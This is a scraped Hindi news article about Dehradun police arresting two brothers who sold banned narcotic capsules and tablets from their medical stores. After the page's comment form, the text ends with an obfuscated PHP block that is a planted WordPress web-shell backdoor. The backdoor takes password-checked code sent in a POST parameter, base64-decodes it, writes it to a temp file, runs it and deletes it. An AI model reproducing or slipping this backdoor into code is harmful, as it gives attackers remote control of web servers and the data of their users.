Uttarakhand: दो भाई दवा की आड़ में बेच रहे थे ‘जहर’, पिछले 10 साल से कर रहे यह कार्य, पुलिस ने मारा छापा

Uttarakhand Press News, 08 May 2023: देहरादून: नशे के कैप्सूल सप्लाई कर नौजवानों की जिंदगी खतरे में डालने वाले मेडिकल स्टोर संचालक दो भाइयों को प्रेमनगर थाना पुलिस ने गिरफ्तार किया है। आरोपितों से 66 हजार प्रतिबंधित कैप्सूल और टैबलेट बरामद किए गए हैं।

दोनों भाई पिछले 10 साल से बिना लाइसेंस यह कार्य कर रहे थे। नशे के इस कारोबार में एक डिस्ट्रीब्यूटर का नाम सामने आया है, जल्द उसकी भी गिरफ्तारी हो सकती है। हिमाचल प्रदेश के बद्दी से ये प्रतिबंधित कैप्सूल व टैबलेट सप्लाई हो रहे थे।

जिले में नशा तस्करों के विरुद्ध हुई बड़ी कार्रवाई को लेकर एसएसपी दलीप सिंह कुंवर ने आरोपितों को पकड़ने वाली पुलिस टीम को 20 हजार और आइजी गढ़वाल रेंज करन नगन्याल ने 40 हजार रुपये पुरस्कार की घोषणा की है।

दोनों भाई प्रतिबंधित नशा बेचते हुए पकड़े गए:
पत्रकारों से वार्ता में वरिष्ठ पुलिस अधीक्षक दलीप सिंह कुंवर ने बताया कि प्रेमनगर थानाध्यक्ष पीडी भट्ट को सूचना मिली कि सुद्धोवाला चौक के निकट वंश मेडिकल स्टोर का संचालक प्रतिबंधित नशे के कैप्सूल और टैबलेट बेचता है।

पुलिस ने मेडिकल स्टोर पर दबिश दी तो दोनों भाई प्रतिबंधित नशा बेचते हुए पकड़े गए। तलाशी के दौरान मेडिकल स्टोर से 54448 कैप्सूल और 11400 टैबलेट बरामद किए गए। पुलिस ने आरोपित कृष्ण कुमार व उसके भाई विनय कुमार निवासी बल्लूपुर को गिरफ्तार कर लिया।

पूछताछ में आरोपितों ने बताया कि वह वर्ष 2013 से यह कार्य कर रहे हैं। उनके पास लाइसेंस भी नहीं है। कई युवक इन कैप्सूल व टैबलेट का उपयोग नशे के लिए करते हैं, इसलिए वह इन्हें महंगे दाम पर बेचते हैं। उनकी सुद्धोवाला चौक पर ही वंश मेडिकल स्टोर व आयुष मेडिकल स्टोर के नाम से दो दुकानें हैं। पहले वह सुद्धोवाला चौक पर किराये की दुकान में मेडिकल स्टो चलाते थे, लेकिन वर्तमान व उन्होंने अपनी दुकानें खरीद ली हैं।

जांच में एक सप्लायर का नाम आया सामने:
एसएसपी ने बताया कि आरोपितों से पूछताछ में एक सप्लायर का नाम सामने आया है। उसका नाम इंद्रजीत है। वह रेसकोर्स में रहता है। आरोपितों ने बताया है कि वह इंद्रजीत से ही नशे के कैप्सूल और टैबलेट खरीदकर लाए थे।

इस मामले में ड्रग इंस्पेटर को भी पत्र लिखा गया है। वहीं, टैबलेट व कैप्सूल पर लगे बैच नंबर को भी चेक किया जा रहा है। ताकि यह पता लगाया जा सके कि ये किस फैक्ट्री में बने हैं। वहीं, पकड़े गए माल के नकली होने का भी अंदेशा जताया जा रहा है।

आरोपितों के खिलाफ गैंगस्टर के तहत होगी कार्रवाई:
एसएसपी ने बताया कि जिस तरह से आरोपितों से बड़ी मात्रा में नशे की खेप बरामद हुई है, उससे लग रहा है कि उन्होंने इस धंधे से काफी संपत्ति अर्जित की है। जल्द ही दोनों भाइयों के खिलाफ गैंगस्टर में मुकदमा दर्ज कर उनकी संपत्ति अटैच करवाने की कार्रवाई शुरू की जाएगी। यदि अन्य आरोपितों के नाम सामने आते हैं, तो उन्हें भी मुकदमे में शामिल किया जाएगा।

Read Previous

यमुनोत्री धाम की यात्रा पर आए एक तीर्थ यात्री की हृदय गति रुकने से मौत, चारधाम में अब तक 17 ने गंवाई जान..

Read Next

Haldwani: किराए पर रहने वाली युवती ने की खुदकुशी, सुसाइड नोट में लिखा – अपनी आदतों से परेशान होकर खुदकुशी कर रही हूं..

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}